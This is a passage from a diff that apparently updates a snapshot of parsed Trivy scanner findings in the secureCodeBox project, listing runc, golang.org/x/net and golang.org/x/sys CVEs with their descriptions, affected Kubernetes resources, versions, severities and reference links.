"https://lists.debian.org/debian-lts-announce/2021/12/msg00005.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-43784", + "https://pkg.go.dev/vuln/GO-2022-0274", + "https://www.cve.org/CVERecord?id=CVE-2021-43784", ], }, "category": "Vulnerability", - "description": "In net/http in Go before 1.18.6 and 1.19.x before 1.19.1, attackers can cause a denial of service because an HTTP/2 connection can hang during closing if shutdown were preempted by a fatal error.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "description": "runc is a CLI tool for spawning and running containers on Linux according to the OCI specification. In runc, netlink is used internally as a serialization system for specifying the relevant container configuration to the \`C\` portion of the code (responsible for the based namespace setup of containers). In all versions of runc prior to 1.0.3, the encoder did not handle the possibility of an integer overflow in the 16-bit length field for the byte array attribute type, meaning that a large enough malicious byte array attribute could result in the length overflowing and the attribute contents being parsed as netlink messages for container configuration. This vulnerability requires the attacker to have some control over the configuration of the container and would allow the attacker to bypass the namespace restrictions of the container by simply adding their own netlink payload which disables all namespaces. The main users impacted are those who allow untrusted images with untrusted configurations to run on their machines (such as with shared cloud infrastructure). runc version 1.0.3 contains a fix for this bug. As a workaround, one may try disallowing untrusted namespace paths from your container. It should be noted that untrusted namespace paths would allow the attacker to disable namespace protections entirely even in the absence of this bug.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "handle server errors after sending GOAWAY", + "name": "integer overflow in netlink bytemsg length field allows attacker to override netlink-based container configuration", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-27664", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2357", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-27664", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2107371", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2107374", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2107383", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2107386", + "value": "https://avd.aquasec.com/nvd/cve-2021-43784", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107388", + "value": "https://access.redhat.com/security/cve/CVE-2021-43784", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2113814", + "value": "https://bugs.chromium.org/p/project-zero/issues/detail?id=2241", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2124669", + "value": "https://github.com/advisories/GHSA-v95c-p5hm-xq8f", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2132868", + "value": "https://github.com/opencontainers/runc/commit/9c444070ec7bb83995dbc0185da68284da71c554", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2132872", + "value": "https://github.com/opencontainers/runc/commit/d72d057ba794164c3cce9451a00b72a78b25e1ae", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2161274", + "value": "https://github.com/opencontainers/runc/commit/dde509df4e28cec33b3c99c6cda3d4fd5beafc77", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", + "value": "https://github.com/opencontainers/runc/commit/f50369af4b571e358f20b139eea52d612eb55eed", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", + "value": "https://github.com/opencontainers/runc/security/advisories/GHSA-v95c-p5hm-xq8f", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", + "value": "https://lists.debian.org/debian-lts-announce/2021/12/msg00005.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-43784", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", + "value": "https://pkg.go.dev/vuln/GO-2022-0274", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-43784", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": "1.1.2", + "foundIn": "Target: 'opt/bitnami/common/bin/gosu' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-29162", + "installedVersion": "v1.0.1", + "packageName": "github.com/opencontainers/runc", + "references": [ + "https://access.redhat.com/errata/RHSA-2022:8090", + "https://access.redhat.com/security/cve/CVE-2022-29162", + "https://bugzilla.redhat.com/2086398", + "https://bugzilla.redhat.com/show_bug.cgi?id=2086398", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29162", + "https://errata.almalinux.org/9/ALSA-2022-8090.html", + "https://errata.rockylinux.org/RLSA-2022:8090", + "https://github.com/advisories/GHSA-f3fp-gc8g-vw66", + "https://github.com/opencontainers/runc/commit/98fe566c527479195ce3c8167136d2a555fe6b65", + "https://github.com/opencontainers/runc/commit/d04de3a9b72d7a2455c1885fc75eb36d02cd17b5", + "https://github.com/opencontainers/runc/releases/tag/v1.1.2", + "https://github.com/opencontainers/runc/security/advisories/GHSA-f3fp-gc8g-vw66", + "https://linux.oracle.com/cve/CVE-2022-29162.html", + "https://linux.oracle.com/errata/ELSA-2022-8090.html", + "https://lists.debian.org/debian-lts-announce/2023/03/msg00023.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AVPZBV7ISA7QKRPTC7ZXWKMIQI2HZEBB/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/D77CKD3AXPMU4PMQIQI5Q74SI4JATNND/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GPQU4YC4AAY54JDXGDQHJEYKSXXG5T2Y/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-29162", + "https://ubuntu.com/security/notices/USN-6088-2", + "https://www.cve.org/CVERecord?id=CVE-2022-29162", + "https://www.openwall.com/lists/oss-security/2022/05/12/1", + ], + }, + "category": "Vulnerability", + "description": "runc is a CLI tool for spawning and running containers on Linux according to the OCI specification. A bug was found in runc prior to version 1.1.2 where \`runc exec --cap\` created processes with non-empty inheritable Linux process capabilities, creating an atypical Linux environment and enabling programs with inheritable file capabilities to elevate those capabilities to the permitted set during execve(2). This bug did not affect the container security sandbox as the inheritable set never contained more capabilities than were included in the container's bounding set. This bug has been fixed in runc 1.1.2. This fix changes \`runc exec --cap\` behavior such that the additional capabilities granted to the process being executed (as specified via \`--cap\` arguments) do not include inheritable capabilities. In addition, \`runc spec\` is changed to not set any inheritable capabilities in the created example OCI spec (\`config.json\`) file.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "runc: incorrect handling of inheritable capabilities", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", + "value": "https://avd.aquasec.com/nvd/cve-2022-29162", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", + "value": "https://access.redhat.com/errata/RHSA-2022:8090", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", + "value": "https://access.redhat.com/security/cve/CVE-2022-29162", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", + "value": "https://bugzilla.redhat.com/2086398", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2086398", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29162", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", + "value": "https://errata.almalinux.org/9/ALSA-2022-8090.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", + "value": "https://errata.rockylinux.org/RLSA-2022:8090", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", + "value": "https://github.com/advisories/GHSA-f3fp-gc8g-vw66", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", + "value": "https://github.com/opencontainers/runc/commit/98fe566c527479195ce3c8167136d2a555fe6b65", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", + "value": "https://github.com/opencontainers/runc/commit/d04de3a9b72d7a2455c1885fc75eb36d02cd17b5", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", + "value": "https://github.com/opencontainers/runc/releases/tag/v1.1.2", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2357.html", + "value": "https://github.com/opencontainers/runc/security/advisories/GHSA-f3fp-gc8g-vw66", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:7129", + "value": "https://linux.oracle.com/cve/CVE-2022-29162.html", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-69cg-p879-7622", + "value": "https://linux.oracle.com/errata/ELSA-2022-8090.html", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", + "value": "https://lists.debian.org/debian-lts-announce/2023/03/msg00023.html", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AVPZBV7ISA7QKRPTC7ZXWKMIQI2HZEBB/", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/54658", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/D77CKD3AXPMU4PMQIQI5Q74SI4JATNND/", }, { "type": "URL", - "value": "https://go.dev/cl/428735", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GPQU4YC4AAY54JDXGDQHJEYKSXXG5T2Y/", }, { "type": "URL", - "value": "https://go.dev/issue/54658", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-29162", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://ubuntu.com/security/notices/USN-6088-2", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-29162", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", + "value": "https://www.openwall.com/lists/oss-security/2022/05/12/1", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": "1.1.5", + "foundIn": "Target: 'opt/bitnami/common/bin/gosu' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2023-28642", + "installedVersion": "v1.0.1", + "packageName": "github.com/opencontainers/runc", + "references": [ + "https://access.redhat.com/security/cve/CVE-2023-28642", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28642", + "https://github.com/advisories/GHSA-g2j6-57v7-gm8c", + "https://github.com/opencontainers/runc/pull/3785", + "https://github.com/opencontainers/runc/security/advisories/GHSA-g2j6-57v7-gm8c", + "https://nvd.nist.gov/vuln/detail/CVE-2023-28642", + "https://ubuntu.com/security/notices/USN-6088-1", + "https://ubuntu.com/security/notices/USN-6088-2", + "https://www.cve.org/CVERecord?id=CVE-2023-28642", + ], + }, + "category": "Vulnerability", + "description": "runc is a CLI tool for spawning and running containers according to the OCI specification. It was found that AppArmor can be bypassed when \`/proc\` inside the container is symlinked with a specific mount configuration. This issue has been fixed in runc version 1.1.5, by prohibiting symlinked \`/proc\`. See PR #3785 for details. users are advised to upgrade. Users unable to upgrade should avoid using an untrusted container image.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "AppArmor can be bypassed when \`/proc\` inside the container is symlinked with a specific mount configuration", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-27664.html", + "value": "https://avd.aquasec.com/nvd/cve-2023-28642", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2802.html", + "value": "https://access.redhat.com/security/cve/CVE-2023-28642", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28642", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", + "value": "https://github.com/advisories/GHSA-g2j6-57v7-gm8c", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", + "value": "https://github.com/opencontainers/runc/pull/3785", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0969", + "value": "https://github.com/opencontainers/runc/security/advisories/GHSA-g2j6-57v7-gm8c", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202209-26", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-28642", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220923-0004/", + "value": "https://ubuntu.com/security/notices/USN-6088-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "https://ubuntu.com/security/notices/USN-6088-2", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-27664", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-28642", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "0.7.0", - "foundIn": "Target: 'usr/local/bin/etcd-3.5.3' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-41723", - "installedVersion": "v0.0.0-20211112202133-69e39bad7dc2", - "packageName": "golang.org/x/net", + "fixedVersion": "1.1.5", + "foundIn": "Target: 'opt/bitnami/common/bin/gosu' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2023-25809", + "installedVersion": "v1.0.1", + "packageName": "github.com/opencontainers/runc", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-41723", - "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", - "https://go.dev/cl/468135", - "https://go.dev/cl/468295", - "https://go.dev/issue/57855", - "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", - "https://pkg.go.dev/vuln/GO-2023-1571", - "https://vuln.go.dev/ID/GO-2023-1571.json", - "https://www.cve.org/CVERecord?id=CVE-2022-41723", + "https://access.redhat.com/security/cve/CVE-2023-25809", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-25809", + "https://github.com/advisories/GHSA-m8cg-xc2p-r3fc", + "https://github.com/opencontainers/runc/commit/0d62b950e60f6980b54fe3bafd9a9c608dc1df17", + "https://github.com/opencontainers/runc/commit/0e6b818a2b0d24fdb6697614e5c5f115bbe8e3a5 (v1.1.5)", + "https://github.com/opencontainers/runc/security/advisories/GHSA-m8cg-xc2p-r3fc", + "https://nvd.nist.gov/vuln/detail/CVE-2023-25809", + "https://ubuntu.com/security/notices/USN-6088-1", + "https://ubuntu.com/security/notices/USN-6088-2", + "https://www.cve.org/CVERecord?id=CVE-2023-25809", ], }, "category": "Vulnerability", - "description": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "description": "runc is a CLI tool for spawning and running containers according to the OCI specification. In affected versions it was found that rootless runc makes \`/sys/fs/cgroup\` writable in following conditons: 1. when runc is executed inside the user namespace, and the \`config.json\` does not specify the cgroup namespace to be unshared (e.g.., \`(docker|podman|nerdctl) run --cgroupns=host\`, with Rootless Docker/Podman/nerdctl) or 2. when runc is executed outside the user namespace, and \`/sys\` is mounted with \`rbind, ro\` (e.g., \`runc spec --rootless\`; this condition is very rare). A container may gain the write access to user-owned cgroup hierarchy \`/sys/fs/cgroup/user.slice/...\` on the host . Other users's cgroup hierarchies are not affected. Users are advised to upgrade to version 1.1.5. Users unable to upgrade may unshare the cgroup namespace (\`(docker|podman|nerdctl) run --cgroupns=private)\`. This is the default behavior of Docker/Podman/nerdctl on cgroup v2 hosts. or add \`/sys/fs/cgroup\` to \`maskedPaths\`.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "avoid quadratic complexity in HPACK decoding", + "name": "Rootless runc makes \`/sys/fs/cgroup\` writable", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-41723", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-41723", - }, - { - "type": "URL", - "value": "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", - }, - { - "type": "URL", - "value": "https://go.dev/cl/468135", - }, - { - "type": "URL", - "value": "https://go.dev/cl/468295", + "value": "https://avd.aquasec.com/nvd/cve-2023-25809", }, { "type": "URL", - "value": "https://go.dev/issue/57855", + "value": "https://access.redhat.com/security/cve/CVE-2023-25809", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-25809", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", + "value": "https://github.com/advisories/GHSA-m8cg-xc2p-r3fc", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", + "value": "https://github.com/opencontainers/runc/commit/0d62b950e60f6980b54fe3bafd9a9c608dc1df17", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", + "value": "https://github.com/opencontainers/runc/commit/0e6b818a2b0d24fdb6697614e5c5f115bbe8e3a5 (v1.1.5)", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", + "value": "https://github.com/opencontainers/runc/security/advisories/GHSA-m8cg-xc2p-r3fc", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-25809", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2023-1571", + "value": "https://ubuntu.com/security/notices/USN-6088-1", }, { "type": "URL", - "value": "https://vuln.go.dev/ID/GO-2023-1571.json", + "value": "https://ubuntu.com/security/notices/USN-6088-2", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-41723", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-25809", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "0.4.0", - "foundIn": "Target: 'usr/local/bin/etcd-3.5.3' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-41717", - "installedVersion": "v0.0.0-20211112202133-69e39bad7dc2", - "packageName": "golang.org/x/net", + "fixedVersion": "0.0.0-20220412211240-33da011f77ad", + "foundIn": "Target: 'opt/bitnami/common/bin/gosu' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-29526", + "installedVersion": "v0.0.0-20210817142637-7d9622a276b7", + "packageName": "golang.org/x/sys", "references": [ - "https://access.redhat.com/errata/RHSA-2023:2367", - "https://access.redhat.com/security/cve/CVE-2022-41717", - "https://bugzilla.redhat.com/2092793", - "https://bugzilla.redhat.com/2161274", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", - "https://errata.almalinux.org/9/ALSA-2023-2367.html", - "https://github.com/advisories/GHSA-xrjj-mj9h-534m", - "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", - "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", - "https://go.dev/cl/455635", - "https://go.dev/cl/455717", - "https://go.dev/issue/56350", - "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", - "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", - "https://linux.oracle.com/cve/CVE-2022-41717.html", - "https://linux.oracle.com/errata/ELSA-2023-2866.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", - "https://pkg.go.dev/vuln/GO-2022-1144", + "https://access.redhat.com/security/cve/CVE-2022-29526", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", + "https://github.com/advisories/GHSA-p782-xgp4-8hr8", + "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", + "https://github.com/golang/go/issues/52313", + "https://go.dev/cl/399539", + "https://go.dev/cl/400074", + "https://go.dev/issue/52313", + "https://groups.google.com/g/golang-announce", + "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", + "https://linux.oracle.com/cve/CVE-2022-29526.html", + "https://linux.oracle.com/errata/ELSA-2022-5337.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", + "https://pkg.go.dev/vuln/GO-2022-0493", + "https://security.gentoo.org/glsa/202208-02", + "https://security.netapp.com/advisory/ntap-20220729-0001/", "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-41717", + "https://www.cve.org/CVERecord?id=CVE-2022-29526", ], }, "category": "Vulnerability", - "description": "An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests. HTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "description": "Go before 1.17.10 and 1.18.x before 1.18.2 has Incorrect Privilege Assignment. When called with a non-zero flags parameter, the Faccessat function could incorrectly report that a file is accessible.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "excessive memory growth in a Go server accepting HTTP/2 requests", + "name": "faccessat checks wrong group", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-41717", + "value": "https://avd.aquasec.com/nvd/cve-2022-29526", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2367", + "value": "https://access.redhat.com/security/cve/CVE-2022-29526", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-41717", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2092793", + "value": "https://github.com/advisories/GHSA-p782-xgp4-8hr8", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2161274", + "value": "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", + "value": "https://github.com/golang/go/issues/52313", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2367.html", + "value": "https://go.dev/cl/399539", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-xrjj-mj9h-534m", + "value": "https://go.dev/cl/400074", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", + "value": "https://go.dev/issue/52313", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", + "value": "https://groups.google.com/g/golang-announce", }, { "type": "URL", - "value": "https://go.dev/cl/455635", + "value": "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", }, { "type": "URL", - "value": "https://go.dev/cl/455717", + "value": "https://linux.oracle.com/cve/CVE-2022-29526.html", }, { "type": "URL", - "value": "https://go.dev/issue/56350", + "value": "https://linux.oracle.com/errata/ELSA-2022-5337.html", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-41717.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2866.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-1144", + "value": "https://pkg.go.dev/vuln/GO-2022-0493", + }, + { + "type": "URL", + "value": "https://security.gentoo.org/glsa/202208-02", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20220729-0001/", }, { "type": "URL", @@ -73434,7 +74267,7 @@ commonly used by applications.", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-41717", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-29526", }, ], "severity": "MEDIUM", @@ -73442,9 +74275,9 @@ commonly used by applications.", { "attributes": { "fixedVersion": "0.0.0-20220412211240-33da011f77ad", - "foundIn": "Target: 'usr/local/bin/etcd-3.5.3' / Class: 'lang-pkgs' / Type: 'gobinary'", + "foundIn": "Target: 'opt/bitnami/common/bin/wait-for-port' / Class: 'lang-pkgs' / Type: 'gobinary'", "id": "CVE-2022-29526", - "installedVersion": "v0.0.0-20210615035016-665e8c7367d1", + "installedVersion": "v0.0.0-20210510120138-977fb7262007", "packageName": "golang.org/x/sys", "references": [ "https://access.redhat.com/security/cve/CVE-2022-29526", @@ -73473,7 +74306,7 @@ commonly used by applications.", }, "category": "Vulnerability", "description": "Go before 1.17.10 and 1.18.x before 1.18.2 has Incorrect Privilege Assignment. When called with a non-zero flags parameter, the Faccessat function could incorrectly report that a file is accessible.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, "name": "faccessat checks wrong group", "references": [ @@ -73574,507 +74407,911 @@ commonly used by applications.", }, { "attributes": { - "fixedVersion": "0.3.7", - "foundIn": "Target: 'usr/local/bin/etcd-3.5.3' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2021-38561", - "installedVersion": "v0.3.6", - "packageName": "golang.org/x/text", + "fixedVersion": "1.2.26", + "foundIn": "Target: 'opt/bitnami/minio-client/bin/mc' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "GHSA-rm8v-mxj3-5rmq", + "installedVersion": "v1.2.19", + "packageName": "github.com/lestrrat-go/jwx", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-38561", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38561", - "https://deps.dev/advisory/OSV/GO-2021-0113", - "https://github.com/advisories/GHSA-ppp9-7jff-5vj2", - "https://go.dev/cl/340830", - "https://go.googlesource.com/text/+/383b2e75a7a4198c42f8f87833eefb772868a56f", - "https://groups.google.com/g/golang-announce", - "https://nvd.nist.gov/vuln/detail/CVE-2021-38561", - "https://pkg.go.dev/golang.org/x/text/language", - "https://pkg.go.dev/vuln/GO-2021-0113", - "https://ubuntu.com/security/notices/USN-5873-1", - "https://www.cve.org/CVERecord?id=CVE-2021-38561", + 